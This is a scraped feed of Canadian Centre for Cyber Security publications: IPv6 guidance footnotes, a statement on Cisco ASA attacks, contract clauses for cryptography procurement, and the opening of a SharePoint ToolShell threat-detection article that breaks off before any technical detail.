The Cyber Centre strongly recommends that GC organizations undertake proactive and informed actions to securely design and scope their <abbr title="Internet Protocol version 4">IPv4</abbr> to <abbr title="Internet Protocol version 6">IPv6</abbr> transition plans in line with Cyber Centre recommendations.</p> </section><aside class="wb-fnote" role="note"><h3 class="mrgn-tp-xl" id="reference">Reference</h3> <dl><dt>Footnote 1</dt> <dd id="fn1"> <p><a href="https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/configure-ipv6-in-windows">Guidance for configuring IPv6 in Windows for advanced users</a></p> <p class="fn-rtn"><a href="#fn1-rf"><span class="wb-inv">Return to footnote</span>1<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 2</dt> <dd id="fn2"> <p><a href="https://datatracker.ietf.org/doc/html/rfc8504">IPv6 Node Requirements</a></p> <p class="fn-rtn"><a href="#fn2-rf"><span class="wb-inv">Return to footnote</span>2<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 3</dt> <dd id="fn3"> <p><a href="https://www.cyber.gc.ca/en/guidance/national-cyber-threat-assessment-2025-2026">National Cyber Threat Assessment 2025-2026</a></p> <p class="fn-rtn"><a href="#fn3-rf"><span class="wb-inv">Return to footnote</span>3<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 4</dt> <dd id="fn4"> <p><a href="https://www.rfc-editor.org/rfc/rfc9099.html">RFC 9099: Operational Security Considerations for IPv6 Networks</a></p> <p class="fn-rtn"><a href="#fn4-rf"><span class="wb-inv">Return to 
footnote</span>4<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 5</dt> <dd id="fn5"> <p><a href="https://datatracker.ietf.org/doc/html/rfc6762">Multicast DNS</a></p> <p class="fn-rtn"><a href="#fn5-rf"><span class="wb-inv">Return to footnote</span>5<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 6</dt> <dd id="fn6"> <p><a href="https://www.rfc-editor.org/rfc/rfc4795.html">Link-Local Multicast Name Resolution (LLMNR)</a></p> <p class="fn-rtn"><a href="#fn6-rf"><span class="wb-inv">Return to footnote</span>6<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 7</dt> <dd id="fn7"> <p><a href="https://www.nist.gov/programs-projects/usgv6-program/usgv6-revision-1">United States Government (USGv6-r1) Profile</a></p> <p class="fn-rtn"><a href="#fn7-rf"><span class="wb-inv">Return to footnote</span>7<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 8</dt> <dd id="fn8"> <p><a href="https://datatracker.ietf.org/doc/html/rfc8305">Happy Eyeballs Version 2: Better Connectivity Using Concurrency</a></p> <p class="fn-rtn"><a href="#fn8-rf"><span class="wb-inv">Return to footnote</span>8<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 9</dt> <dd id="fn9"> <p><a href="https://datatracker.ietf.org/doc/html/rfc6343">RFC 6343 Advisory Guidelines for 6to4 Deployment</a></p> <p class="fn-rtn"><a href="#fn9-rf"><span class="wb-inv">Return to footnote</span>9<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 10</dt> <dd id="fn10"> <p><a href="https://en.wikipedia.org/wiki/ISATAP">Wikipedia: RFC 5214 Intra-site Automatic Tunnel Addressing Protocol (ISATAP)</a></p> <p class="fn-rtn"><a href="#fn10-rf"><span class="wb-inv">Return to footnote</span>10<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 11</dt> <dd id="fn11"> <p><a href="https://www.rfc-editor.org/rfc/rfc9099.html">RFC 9099: Operational Security Considerations for IPv6 Networks</a></p> <p class="fn-rtn"><a 
href="#fn11-rf"><span class="wb-inv">Return to footnote</span>11<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 12</dt> <dd id="fn12"> <p><a href="https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/configure-ipv6-in-windows">Guidance for configuring IPv6 in Windows for advanced users</a></p> <p class="fn-rtn"><a href="#fn12-rf"><span class="wb-inv">Return to footnote</span>12<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 13</dt> <dd id="fn13"> <p><a href="https://datatracker.ietf.org/doc/html/rfc7934.txt">RFC 7934 Host Address Availability Recommendations</a></p> <p class="fn-rtn"><a href="#fn13-rf"><span class="wb-inv">Return to footnote</span>13<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 14</dt> <dd id="fn14"> <p><a href="https://www.rfc-editor.org/rfc/rfc8415">RFC 8415: Dynamic Host Configuration Protocol for IPv6 (DHCPv6)</a></p> <p class="fn-rtn"><a href="#fn14-rf"><span class="wb-inv">Return to footnote</span>14<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 15</dt> <dd id="fn15"> <p><a href="https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/ipaddr_dhcp/configuration/15-sy/dhcp-15-sy-book/ip6-dhcpv6-guard.pdf">Cisco: DHCP – DHCPv6 Guard</a></p> <p class="fn-rtn"><a href="#fn15-rf"><span class="wb-inv">Return to footnote</span>15<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 16</dt> <dd id="fn16"> <p><a href="https://www.rfc-editor.org/rfc/rfc8156">RFC 8156: DHCPv6 Failover Protocol</a></p> <p class="fn-rtn"><a href="#fn16-rf"><span class="wb-inv">Return to footnote</span>16<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 17</dt> <dd id="fn17"> <p><a href="https://datatracker.ietf.org/doc/rfc9686/">Registering Self-Generated IPv6 Addresses Using DHCPv6</a></p> <p class="fn-rtn"><a href="#fn17-rf"><span class="wb-inv">Return to footnote</span>17<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 18</dt> <dd id="fn18"> 
<p><a href="https://datatracker.ietf.org/doc/html/rfc4861">RFC 4861 Neighbor Discovery for IP version 6 (IPv6)</a></p> <p class="fn-rtn"><a href="#fn18-rf"><span class="wb-inv">Return to footnote</span>18<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 19</dt> <dd id="fn19"> <p><a href="https://datatracker.ietf.org/doc/html/rfc3971">RFC 3971 SEcure Neighbor Discovery (SEND)</a></p> <p class="fn-rtn"><a href="#fn19-rf"><span class="wb-inv">Return to footnote</span>19<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 20</dt> <dd id="fn20"> <p><a href="https://datatracker.ietf.org/doc/html/rfc4890">RFC 4890 Recommendations for Filtering ICMPv6 Messages in Firewalls</a></p> <p class="fn-rtn"><a href="#fn20-rf"><span class="wb-inv">Return to footnote</span>20<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 21</dt> <dd id="fn21"> <p><a href="https://datatracker.ietf.org/doc/rfc4966/">RFC 4966 Reasons to Move the Network Address Translator – Protocol Translator (NAT-PT) to Historic Status</a></p> <p class="fn-rtn"><a href="#fn21-rf"><span class="wb-inv">Return to footnote</span>21<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 22</dt> <dd id="fn22"> <p><a href="https://datatracker.ietf.org/doc/html/rfc6146">RFC 6146 Stateful NAT64: Network Address and Protocol Translation from IPv6 Clients to IPv4 Servers</a></p> <p class="fn-rtn"><a href="#fn22-rf"><span class="wb-inv">Return to footnote</span>22<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 23</dt> <dd id="fn23"> <p><a href="https://datatracker.ietf.org/doc/html/rfc6147">DNS64: DNS Extensions for Network Address Translation from IPv6 Clients to IPv4 Servers</a></p> <p class="fn-rtn"><a href="#fn23-rf"><span class="wb-inv">Return to footnote</span>23<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 24</dt> <dd id="fn24"> <p><a href="https://datatracker.ietf.org/doc/html/rfc7915">RFC 7915 Stateless IP/ICMP Translation 
Algorithm</a></p> <p class="fn-rtn"><a href="#fn24-rf"><span class="wb-inv">Return to footnote</span>24<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 25</dt> <dd id="fn25"> <p><a href="https://datatracker.ietf.org/doc/html/rfc6877">464XLAT: Combination of Stateful and Stateless Translation</a></p> <p class="fn-rtn"><a href="#fn25-rf"><span class="wb-inv">Return to footnote</span>25<span class="wb-inv"> referrer</span></a></p> </dd> </dl></aside></div> </div> </div> </div> </div> </article>

  • Joint guidance on creating and maintaining a definitive view of your operational technology architecture
    by Canadian Centre for Cyber Security on September 29, 2025 at 12:06 pm

    This joint guidance has been developed with contributions from partnering agencies and is part of a series of publications aiming to draw attention to the importance of cyber security in operational technology.

  • Statement from the Canadian Centre for Cyber Security on malware targeting global organizations through Cisco Systems
    by Canadian Centre for Cyber Security on September 25, 2025 at 4:04 pm

    <article data-history-node-id="6835" about="/en/news-events/statement-canadian-centre-cyber-security-malware-targeting-global-organizations-through-cisco-systems" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout--onecol"> <div class="layout__region layout__region--content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p>The Canadian Centre for Cyber Security (Cyber Centre), a part of the Communications Security Establishment Canada (CSE), is urging Canadian organizations to take immediate action to protect themselves in response to a serious new cyber security threat identified today by Cisco: <a href="https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_continued_attacks">Cisco Event Response: Continued Attacks Against Cisco Firewalls</a>. This threat affects end-of-life Cisco <abbr title="Adaptive Security Appliance">ASA</abbr> devices.</p> <p>Timing is crucial when vulnerabilities like these are identified. 
We strongly recommend network defenders bolster their defences based on our latest alert and advisory, and apply appropriate patches immediately.</p> <ul><li>Read the Cyber Centre’s alert on this threat: <a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="0594ba8c-7337-46bf-b42f-e2761f463f06" href="/en/alerts-advisories/al25-012-vulnerabilities-impacting-cisco-asa-ftd-devices-cve-2025-20333-cve-2025-20362-cve-2025-20363">AL25-012 – Vulnerabilities impacting Cisco ASA and FTD devices – CVE-2025-20333, CVE-2025-20362 and CVE-2025-20363</a></li> <li>Read the Cyber Centre’s advisory on this threat: <a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="cd17a5c1-7289-4cfd-b5eb-d434993b77d2" href="/en/alerts-advisories/cisco-security-advisory-av25-619">Cisco security advisory (AV25-619)</a></li> </ul><p>This threat activity uses advanced techniques to avoid detection, making it difficult to identify through conventional means. If you believe your organization may be affected, please call us at <a href="tel:+18332923788">1-833-CYBER-88</a> or email <a href="mailto:contact@cyber.gc.ca">contact@cyber.gc.ca</a> as soon as possible.</p> <h2>Quotes</h2> <blockquote> <p>"This is a critical moment for Canadian organizations. Threat actors are targeting legacy systems with increasing sophistication. I urge all critical infrastructure sectors to act swiftly. The Cyber Centre stands ready to assist. Early action is the best defence to protect your systems and safeguard your information."</p> <p>- Rajiv Gupta, Head of the Canadian Centre for Cyber Security</p> </blockquote> <h2>Background</h2> <p>The Cyber Centre is aware of cyber threat activity against Cisco <abbr title="Adaptive Security Appliance">ASA</abbr> 5500-X Series devices involving the deployment of highly sophisticated malware, targeting global organizations. 
These types of devices are commonly used by organizations across Canada.</p> <p>Expert teams at the Cyber Centre are actively investigating the vulnerability’s scope and have initiated outreach to support stakeholders and coordinate a unified response.</p> <p>Together, through vigilance and collective action, we can continue to strengthen Canada’s cyber resilience from coast to coast to coast.</p> <p>For more information on vulnerabilities, please visit the Cyber Centre’s <a href="/en/alerts-advisories">Alerts and advisories page</a>.</p> <p>For best practices, please visit the Cyber Centre’s <a href="/en/guidance">Guidance page</a>.</p> </div> </div> </div> </div> </div> </article>

  • Recommended Contract Clauses for Cryptography (ITSM.00.501)
    by Canadian Centre for Cyber Security on September 22, 2025 at 7:38 pm

    <article data-history-node-id="6705" about="/en/guidance/recommended-contract-clauses-cryptography-itsm00501" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout--onecol"> <div class="layout__region layout__region--content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><div class="row"> <div class="col-md-4 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>September 2025</strong></p> </div> <div class="col-md-4 hidden-xs hidden-sm"> <p class="text-center"><strong>Management series</strong></p> </div> <div class="col-md-4 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSM.00.501</strong></p> </div> <div class="col-md-12 mrgn-tp-lg"> <div class="mrgn-bttm-md well well-sm col-md-4 col-sm-12 col-xs-12 pull-right mrgn-lft-md"> <p class="mrgn-tp-sm"><strong>Alternate format</strong>: <a href="/sites/default/files/itsm.00.501-recommended-contract-clauses-cryptography.pdf">Recommended Contract Clauses for Cryptography – ITSM.00.501 (PDF, 462 KB)</a></p> </div> <h2 class="text-info mrgn-tp-0">Foreword</h2> <p>This is an <span class="text-uppercase">unclassified</span> publication, issued under the authority of the Head of the Canadian Centre for Cyber Security (Cyber Centre). 
For more information, contact the Cyber Centre:</p> <p><span class="glyphicon glyphicon-envelope"></span><span class="wb-inv">email</span> <a href="mailto:contact@cyber.gc.ca">contact@cyber.gc.ca</a> | <span class="glyphicon glyphicon-phone"></span><span class="wb-inv">Mobile</span> <a href="tel:613-949-7048">613-949-7048</a> or <a href="tel:+1-833-292-3788">1-833-CYBER-88</a></p> <h2 class="text-info">Effective date</h2> <p>This publication takes effect in September 2025.</p> <h2 class="text-info">Revision history</h2> <ol><li>First release: September 1, 2025</li> </ol></div> </div> <section><details class="mrgn-tp-md"><summary><h2 class="h3">Table of contents</h2> </summary><ul class="list-unstyled"><li><a href="#overview">Overview</a></li> <li><a href="#introduction">1 Introduction</a> <ul><li><a href="#scope">1.1 Scope</a></li> </ul></li> <li><a href="#cryptographic-considerations">2 Cryptographic considerations</a> <ul><li><a href="#product">2.1 Product considerations</a> <ul><li><a href="#recommended">2.1.1 Recommended cryptographic algorithms</a></li> <li><a href="#cryptographic-agility">2.1.2 Cryptographic agility</a></li> <li><a href="#certification">2.1.3 Cryptographic certification</a></li> </ul></li> <li><a href="#considerations">2.2 Considerations for service providers and cloud services</a> <ul><li><a href="#post-quantum">2.2.1 Post-quantum cryptography</a></li> <li><a href="#configuration">2.2.2 Configuration</a></li> <li><a href="#validated">2.2.3 Using validated cryptographic modules and algorithms</a></li> </ul></li> </ul></li> <li><a href="#terms">3 Terms and conditions</a></li> <li><a href="#conclusion">4 Conclusion</a></li> </ul></details></section><section><h2 class="text-info" id="overview">Overview</h2> <p>As your organization increases the use of cryptography to protect your infrastructure and data, there is a growing need to ensure that your organization purchases products and services that 
provide effective protection. Whether procuring a single-use product or contracting with a service provider such as a cloud service provider (CSP), your organization must consider certain elements to ensure that the product or service will meet your needs. This publication provides advice and guidance on what to consider when procuring products and services that use cryptography, including example clauses.</p> </section><section><h2 class="text-info" id="introduction">1 Introduction</h2> <p>The guidance in this publication highlights important security considerations for your organization when purchasing products and services that use cryptography. This includes but is not limited to service providers and cloud service providers (CSPs).</p> <p>While vendors may present initial foundational terms and conditions, your organization’s management team is responsible for demonstrating and validating that the terms and conditions and the contract’s supporting security clauses address your organization’s business security needs.</p> <p>The terms and conditions should be adaptable for future modifications to safeguard the interests of your organization. The terms and conditions in the service contract should also provide your organization with the best possible business outcomes. Your organization must initiate proactive measures to ensure service provisions include cyber security mechanisms for identifying, communicating, mitigating and preventing risks.</p> <p>This publication outlines cryptographic considerations that should be factored in alongside the primary functional and legal contracting aspects when working with a vendor.</p> <p>The clauses outlined in this publication should not be considered legal advice. 
Rather, they offer context for your organization and can help your organization determine considerations and questions to ask when procuring cryptographic products and services.</p> <div> <h3 id="scope">1.1 Scope</h3> <p>The Cyber Centre provides advice and guidance on selecting and using cryptographic algorithms to protect the authenticity, confidentiality and integrity of sensitive information. This publication provides advice and guidance on what to consider when engaging with a vendor to purchase products or services that use cryptography for the protection of <span class="text-uppercase">unclassified</span>, <span class="text-uppercase">protected A</span> and <span class="text-uppercase">protected B</span> information.</p> <p><strong>Disclaimer:</strong> The Communications Security Establishment Canada (CSE) and its Cyber Centre do not recommend or endorse the use of any particular contracting clause listed in this publication. The example clauses are provided for informational purposes only, as examples of contract clauses that may be useful when procuring products and services that use cryptography. 
We recommend seeking legal and procurement advice when using these clauses to ensure that they meet your organization’s requirements.</p> </div> </section><section><h2 class="text-info" id="cryptographic-considerations">2 Cryptographic considerations</h2> <p>To protect the confidentiality, integrity and authenticity of your organization’s data, you must ensure that all infrastructure effectively uses strong cryptography for both on-premises environments and service provider environments. This includes cloud environments.</p> <p>The following sections present items that should be considered when engaging with vendors. The considerations discuss cryptographic algorithms, modules and parameters to support organizations in following Cyber Centre guidance.</p> <p><a href="#product">Section 2.1 Product considerations</a> outlines considerations for purchasing products and focuses on the requirements of the products being purchased. <a href="#considerations">Section 2.2 Considerations for service providers and cloud services</a> provides advice and guidance for engaging with service and cloud providers and focuses on how the vendor selects, configures and uses cryptography.</p> <div> <h3 id="product">2.1 Product considerations</h3> <p>This section provides product considerations and example contract clauses to use when purchasing products that support cryptography. The clauses have been developed for products that have built-in cryptographic modules, such as virtual private networks (VPN) and other network appliances that support cryptography natively. 
These considerations can also be used to develop requirements for generic computing devices that will have software installed after purchase (for example, servers).</p> <p><strong>Note:</strong> The Cyber Centre publication <a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="8ca102c3-b06e-4fe3-89b1-65f2a6866bd3" href="/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111">Cryptographic algorithms for <span class="text-uppercase">unclassified</span>, <span class="text-uppercase">protected A</span>, and <span class="text-uppercase">protected B</span> information (ITSP.40.111)</a> is updated regularly as advice and guidance changes. Any clauses that are used to procure products and that reference ITSP.40.111 should specify the publication version.</p> <div> <h4 id="recommended">2.1.1 Recommended cryptographic algorithms</h4> <p>Contractual clauses should ensure that cryptographic modules use algorithms recommended in ITSP.40.111 that meet your system requirements. Additionally, to avoid extra costs during the migration to post-quantum cryptography (PQC), we recommend that all newly procured cryptographic modules support appropriate PQC algorithms.</p> <p>The following clauses recognize that some vendors do not currently support PQC and that some standards that will use the algorithms may still be under development. By specifying a date by which the vendor must provide PQC capabilities, your organization can purchase from the vendor when needed without waiting for the vendor to have PQC-capable products. 
The vendor will be required to provide upgrades to the cryptographic modules on or before the date specified.</p> <p><strong>Example clause structure and language</strong></p> <ul><li>Cryptographic modules must use only CSE-approved cryptographic algorithms with cryptographic parameter sizes and key lengths as specified in <a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="8ca102c3-b06e-4fe3-89b1-65f2a6866bd3" href="/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111">Cryptographic algorithms for <span class="text-uppercase">unclassified</span>, <span class="text-uppercase">protected A</span>, and <span class="text-uppercase">protected B</span> information (ITSP.40.111)</a>.</li> <li>By the end of 2026, cryptographic modules implementing key establishment schemes must support appropriate post-quantum cryptography compliant with Cryptographic algorithms for <span class="text-uppercase">unclassified</span>, <span class="text-uppercase">protected A</span>, and <span class="text-uppercase">protected B</span> information (ITSP.40.111).</li> <li>By the end of 2026, cryptographic modules implementing digital signature schemes must support appropriate post-quantum cryptography compliant with Cryptographic algorithms for <span class="text-uppercase">unclassified</span>, <span class="text-uppercase">protected A</span>, and <span class="text-uppercase">protected B</span> information (ITSP.40.111).</li> </ul> </div> <div> <h4 id="cryptographic-agility">2.1.2 Cryptographic agility</h4> <p>Using systems that support cryptographic agility enables organizations to reconfigure or upgrade cryptographic technologies as needed. 
This is important because progress in cryptographic research, vulnerability research and computing can weaken cryptographic deployments over time, leaving them with less strength than when they were first deployed. Products should have the capability to modify parameters, such as key lengths, parameter sizes and key lifetimes, and to select cryptographic algorithms without replacing software or hardware components. This will reduce both the expense and time needed for purchasing new infrastructure. Products must also have the critical ability to securely patch systems that use cryptography to ensure that vulnerabilities are mitigated as they are discovered.</p> <p>For more information on cryptographic agility, read our publication <a href="https://www.cyber.gc.ca/en/guidance/guidance-becoming-cryptographically-agile-itsap40018">Guidance on becoming cryptographically agile (ITSAP.40.018)</a>.</p> <p><strong>Example clause structure and language</strong></p> <ul><li>Cryptographic modules must support cryptographic agility by providing cryptographic algorithms, parameter sizes, key lengths and crypto periods that are configurable.</li> <li>Cryptographic modules must support vendor-signed patches and updates.</li> </ul> </div> <div> <h4 id="certification">2.1.3 Cryptographic certification</h4> <p>We recommend that all cryptographic modules be validated through the <a href="https://www.cyber.gc.ca/en/tools-services/cryptographic-module-validation-program-cmvp">Cryptographic Module Validation Program (CMVP)</a>. The CMVP is jointly managed by the Cyber Centre and the National Institute of Standards and Technology (NIST). It ensures that vendors implement cryptography correctly in their products and that they follow Cyber Centre–recommended security best practices. 
To find validated modules, organizations can search the database of CMVP-validated modules, which is hosted by NIST. Cryptographic algorithms used in the modules should be validated by the <a href="https://csrc.nist.gov/projects/cryptographic-algorithm-validation-program">Cryptographic Algorithm Validation Program (CAVP)</a>.</p> <p>CMVP certification is specific to the details provided in the security policy available on the product certificate webpage. It is important that products use the cryptographic module according to that security policy. This ensures with a high degree of certainty that the module will provide the expected security services in the expected manner.</p> <p><strong>Example clause structure and language</strong></p> <ul><li>Cryptographic algorithms must be validated by the Cryptographic Algorithm Validation Program (CAVP) with a certificate listed on the <a href="https://csrc.nist.gov/projects/cryptographic-algorithm-validation-program/validation-search">CAVP validation list</a>.</li> <li>Cryptographic modules must be validated by the Cryptographic Module Validation Program (CMVP) with an active CMVP certification and a certificate number listed on the <a href="https://csrc.nist.gov/Projects/Cryptographic-Module-Validation-Program/Validated-Modules">CMVP-validated modules list</a>.</li> <li>Cryptographic modules must be applied in accordance with the cryptographic module security policy listed on the CMVP-validated modules list, in either an approved or an allowed mode.</li> </ul> </div> </div> <div> <h3 id="considerations">2.2 Considerations for service providers and cloud services</h3> <p>Organizations that outsource IT infrastructure or software solution management to cloud vendors or service providers must consider the cryptography used to protect the information. 
This section provides additional cryptographic considerations when contracting a service or cloud provider.</p> <p>Your organization should ensure that contracting requirements obligate the contractor to maintain IT systems that are aligned with current cryptographic guidance. In addition to this publication, the Cyber Centre publication <a href="https://www.cyber.gc.ca/en/guidance/recommended-cyber-security-contract-clauses-cloud-services-itsm50104">Recommended cyber security contract clauses for cloud services (ITSM.50.104)</a> provides general procurement clauses and considerations when acquiring cloud-based solutions or services.</p> <p><strong>Note:</strong> We recommend that contracts with service providers ensure contractors remain current with the latest versions of ITSP.40.111 and our <a href="https://www.cyber.gc.ca/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Guidance on securely configuring network protocols (ITSP.40.062)</a>. As such, clauses that reference either ITSP.40.111 or ITSP.40.062 should not reference a specific version or publication date and should require contractors to remain aligned with current Cyber Centre recommendations.</p> <div> <h4 id="post-quantum">2.2.1 Post-quantum cryptography</h4> <p>We recommend that all cryptographic modules support CSE-approved PQC algorithms as soon as they are available. The following clauses allow organizations to procure from service providers as needed, with the understanding that the cryptographic modules must be migrated to support PQC no later than the date specified. 
This approach provides flexibility to both the purchaser and the vendor while ensuring that the PQC migration is not delayed or more costly than necessary.</p> <p><strong>Example clause structure and language</strong></p> <ul><li>By the end of 2026, cryptographic modules implementing key establishment schemes must support appropriate post-quantum cryptography compliant with <a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="8ca102c3-b06e-4fe3-89b1-65f2a6866bd3" href="/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111">Cryptographic algorithms for <span class="text-uppercase">unclassified</span>, <span class="text-uppercase">protected A</span>, and <span class="text-uppercase">protected B</span> information (ITSP.40.111)</a>.</li> <li>By the end of 2026, cryptographic modules implementing digital signature schemes must support appropriate post-quantum cryptography compliant with Cryptographic algorithms for <span class="text-uppercase">unclassified</span>, <span class="text-uppercase">protected A</span>, and <span class="text-uppercase">protected B</span> information (ITSP.40.111).</li> </ul> </div> <div> <h4 id="configuration">2.2.2 Configuration</h4> <p>Cryptography should be configured to operate according to the advice and guidance provided in the Cyber Centre’s publications ITSP.40.111 and ITSP.40.062. Following the most recent versions of these publications will help to keep your environment secure as cryptographic guidance evolves. 
Additionally, we recommend that cryptography be configured and operated in an approved or allowed mode found in the CMVP security policy.</p> <p><strong>Example clause structure and language</strong></p> <p>The Contractor must:</p> <ul><li>configure systems to only permit use of cryptography in accordance with CSE-approved cryptographic algorithms and cryptographic parameter sizes, key lengths and key lifetimes, as specified in <a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="8ca102c3-b06e-4fe3-89b1-65f2a6866bd3" href="/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111">Cryptographic algorithms for <span class="text-uppercase">unclassified</span>, <span class="text-uppercase">protected A</span>, and <span class="text-uppercase">protected B</span> information (ITSP.40.111)</a> and <a href="https://www.cyber.gc.ca/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Guidance on securely configuring network protocols (ITSP.40.062)</a></li> <li>ensure these policies remain consistent with any subsequent published versions</li> </ul> </div> <div> <h4 id="validated">2.2.3 Using validated cryptographic modules and algorithms</h4> <p>Similar to <a href="#certification">Section 2.1.3 Cryptographic certification</a> on procuring products, we recommend that only algorithms and modules that have been validated by CAVP and CMVP, respectively, be used in cloud and service provider environments.</p> <p><strong>Example clause structure and language</strong></p> <ul><li>Cryptographic algorithms permitted to operate must be validated by the Cryptographic Algorithm Validation Program (CAVP) with a certificate listed on the <a 
href="https://csrc.nist.gov/projects/cryptographic-algorithm-validation-program/validation-search">CAVP validation list</a>.</li> <li>Cryptographic modules must be validated by the Cryptographic Module Validation Program (CMVP) with an active CMVP certification and a certificate number listed on the <a href="https://csrc.nist.gov/Projects/Cryptographic-Module-Validation-Program/Validated-Modules">CMVP-validated modules list</a>.</li> <li>Cryptographic modules must be applied and operated in accordance with the cryptographic module security policy listed on the CMVP-validated modules list, in either an approved or an allowed mode.</li> </ul> </div> </div> </section><section><h2 class="text-info" id="terms">3 Terms and conditions</h2> <p>A vendor or contractor may already have terms and conditions they use when selling their products and services. Many of the clauses recommended in this publication may be covered using different contractual language (for example, referencing NIST publications rather than Cyber Centre publications).</p> <p>In these situations, we recommend that organizations carefully compare the recommended clauses with the ones presented by the vendor, as well as any documents that the vendor references. This will help to ensure that the product or service that your organization purchases will meet your cryptographic requirements. 
As with any legally binding contract, we recommend seeking legal advice.</p> </section><section><h2 class="text-info" id="conclusion">4 Conclusion</h2> <p>Cryptography provides an important means to protect your organization’s IT environments, whether in the cloud or managed on premises. However, it is important to ensure that the cryptographic products that these systems use to protect your data are sufficiently strong and secure. Using products that meet the Cyber Centre’s recommendations on cryptography, including validations by CAVP and CMVP, will help provide effective data confidentiality and integrity.</p> <p>This publication is provided as general guidance for any organization purchasing cryptographic products or using them in their environments. As indicated, this is not legal advice.</p> </section></div> </div> </div> </div> </div> </article>

  • Threat detection for SharePoint vulnerabilities
    by Canadian Centre for Cyber Security on September 5, 2025 at 2:11 pm

    <article data-history-node-id="6744" about="/en/news-events/threat-detection-sharepoint-vulnerabilities" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout--onecol"> <div class="layout__region layout__region--content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><div class="row"> <div class="col-md-12"> <p>The Canadian Centre for Cyber Security (Cyber Centre) is <strong>actively tracking multiple campaigns exploiting recently disclosed critical vulnerabilities in on-premises Microsoft SharePoint servers</strong>, including CVE-2025-49704, CVE-2025-49706, CVE-2025-53770 and CVE-2025-53771. These widespread campaigns leverage an exploit chain known as <strong>ToolShell</strong>.</p> <p>To help defenders combat attacks leveraging these vulnerabilities, the Cyber Centre has compiled a detailed analysis derived from recent investigations. 
This analysis outlines the <strong>full attack path</strong>, examines the <strong>evolution and use of the ToolShell exploit chain</strong>, and provides an <strong>in-depth characterization of the threat actor’s techniques</strong>, along with critical mitigation and detection guidance.</p> </div> </div> <section><details class="mrgn-tp-md"><summary><h2 class="h3">Table of contents</h2> </summary><ul class="list-unstyled"><li><a href="#summary">Executive summary</a></li> <li><a href="#overview">An incident overview</a></li> <li><a href="#analysis">Analysis of the incident</a></li> <li><a href="#indicators">Indicators of compromise and recommendations</a></li> <li><a href="#tools-services">Cyber Centre tools and services</a></li> <li><a href="#acknowledgements">Acknowledgements</a></li> </ul></details></section><section><h2 class="text-info" id="summary">Executive summary</h2> <p>This technical article aims to raise awareness and describe some of the tactics, techniques, and procedures (TTPs) associated with a threat actor seen exploiting the vulnerabilities in on-premises Microsoft SharePoint servers. The Canadian Centre for Cyber Security’s (Cyber Centre) preliminary findings highlight that this threat actor initially exploited a server and then used a novel technique with custom .NET payloads to gain and maintain code execution. Subsequent analysis of dozens of custom in-memory payloads provided valuable insight into the extent of the compromise and the threat actor’s intentions and activities.</p> </section><section><h2 class="text-info" id="overview">An incident overview</h2> <p>The events in the timeline below highlight the type of post-exploitation behaviour observed by the Cyber Centre. 
